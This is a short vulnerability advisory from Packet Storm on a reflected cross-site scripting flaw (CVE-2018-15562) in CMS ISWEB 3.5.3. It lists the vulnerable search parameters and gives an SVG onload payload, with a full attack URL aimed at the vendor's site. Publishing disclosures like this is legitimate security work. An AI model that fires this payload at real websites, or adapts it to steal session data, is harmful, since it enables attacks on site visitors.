CMS ISWEB 3.5.3 Cross Site Scripting

2018-08-28T00:00:00
ID PACKETSTORM:149109
Type packetstorm
Reporter Thiago Sena
Modified 2018-08-28T00:00:00

Description

                                        
                                            `CMS ISWEB 3.5.3 XSS Reflected  
  
> CVE  
  
CVE-2018-15562  
  
> Parameter vuln:  
  
ordineRis,  
sezioneRicerca  
oggettiRicerca  
  
> PoC Prints: https://i.imgur.com/5YpESoC.png  
  
> Vendor of Product  
http://www.isweb.it  
  
  
> Attack Type  
Remote  
  
> Attack Vectors  
Payload:"><svg/onload=alert(String.fromCharCode(88,83,83))>  
URL: http://www.isweb.it/index.php?azione=cerca&id_sezione=505&ordineRis=default&sezioneRicerca=505&oggettiRicerca="><svg/onload=alert(String.fromCharCode(88,83,83))>  
  
> Discoverer  
Offensive0Labs - Thiago "thxsena" Sena & Rafael Fontes Souza  
  
  
`